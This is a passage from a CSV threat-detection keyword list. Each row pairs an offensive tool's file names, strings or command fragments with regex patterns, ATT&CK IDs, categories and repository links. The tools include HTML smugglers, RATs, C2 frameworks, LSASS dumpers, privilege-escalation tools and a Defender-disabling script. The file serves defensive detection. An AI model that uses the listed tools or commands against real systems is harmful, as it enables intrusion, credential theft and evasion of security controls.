Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Successfully embedded EXE into PNG*",".{0,1000}Successfully\sembedded\sEXE\sinto\sPNG.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Successfully installed wraith to run on startup *",".{0,1000}Successfully\sinstalled\swraith\sto\srun\son\sstartup\s.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*sudo ./dnsstager*",".{0,1000}sudo\s\.\/dnsstager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*sudo ./recv -f *",".{0,1000}sudo\s\.\/recv\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*sudo ./startup.sh*",".{0,1000}sudo\s\.\/startup\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*sudo bloodhound*",".{0,1000}sudo\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*sudo iodine *",".{0,1000}sudo\siodine\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*sudo -nS id' && lse_sudo=true*",".{0,1000}sudo\s\-nS\sid\'\s\&\&\slse_sudo\=true.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*sudo socat -v TCP-LISTEN:135*rogueOxidResolverPort*",".{0,1000}sudo\ssocat\s\-v\sTCP\-LISTEN\:135.{0,1000}rogueOxidResolverPort.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*sudo tmux new -s icebreaker*",".{0,1000}sudo\stmux\snew\s\-s\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*sudo_inject*",".{0,1000}sudo_inject.{0,1000}","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","672","120","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" "*SUDO_KILLER*",".{0,1000}SUDO_KILLER.{0,1000}","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","2096","245","2024-03-13T16:20:42Z","2018-12-07T21:08:02Z" "*sudomy.git*",".{0,1000}sudomy\.git.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*sudopwn.c*",".{0,1000}sudopwn\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*SUID3NUM -*",".{0,1000}SUID3NUM\s\-.{0,1000}","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? ??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","595","126","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" "*sullo/nikto*",".{0,1000}sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*SunloginClient_11.0.0.33162_X64.exe*",".{0,1000}SunloginClient_11\.0\.0\.33162_X64\.exe.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*sunnyelf/cheetah/archive/master.zip*",".{0,1000}sunnyelf\/cheetah\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*sunnyelf[@hackfun.org]*",".{0,1000}sunnyelf\[\@hackfun\.org\].{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*superhedgy/AttackSurfaceMapper*",".{0,1000}superhedgy\/AttackSurfaceMapper.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*Supernova.exe -*",".{0,1000}Supernova\.exe\s\-.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*Supernova-main.zip*",".{0,1000}Supernova\-main\.zip.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*supershell*winpty.dll*",".{0,1000}supershell.{0,1000}winpty\.dll.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*supershell*winpty-agent.exe*",".{0,1000}supershell.{0,1000}winpty\-agent\.exe.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Supply either a 32-character RC4/NT hash or a 64-character AES256 hash*",".{0,1000}Supply\seither\sa\s32\-character\sRC4\/NT\shash\sor\sa\s64\-character\sAES256\shash.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*surajpkhetani/AutoSmuggle*",".{0,1000}surajpkhetani\/AutoSmuggle.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*suspended_run *",".{0,1000}suspended_run\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*suspendresume.x64.*",".{0,1000}suspendresume\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*suspendresume.x86.*",".{0,1000}suspendresume\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*'svc_smuggling'*",".{0,1000}\'svc_smuggling\'.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*svc_stager.exe*",".{0,1000}svc_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW2_HashSyscall*",".{0,1000}SW2_HashSyscall.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SW3_GetSyscallAddress*",".{0,1000}SW3_GetSyscallAddress.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*swagkarna/Defeat-Defender-V*",".{0,1000}swagkarna\/Defeat\-Defender\-V.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*swaks --to * --from * --header *Subject: * --body * --server *",".{0,1000}swaks\s\-\-to\s.{0,1000}\s\-\-from\s.{0,1000}\s\-\-header\s.{0,1000}Subject\:\s.{0,1000}\s\-\-body\s.{0,1000}\s\-\-server\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SwampThing.pdb*",".{0,1000}SwampThing\.pdb.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SwampThing.sln*",".{0,1000}SwampThing\.sln.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SWbemServicesImplant*",".{0,1000}SWbemServicesImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*SweetPotato by @_EthicalChaos_*",".{0,1000}SweetPotato\sby\s\@_EthicalChaos_.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*sweetpotato -p*",".{0,1000}sweetpotato\s\-p.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 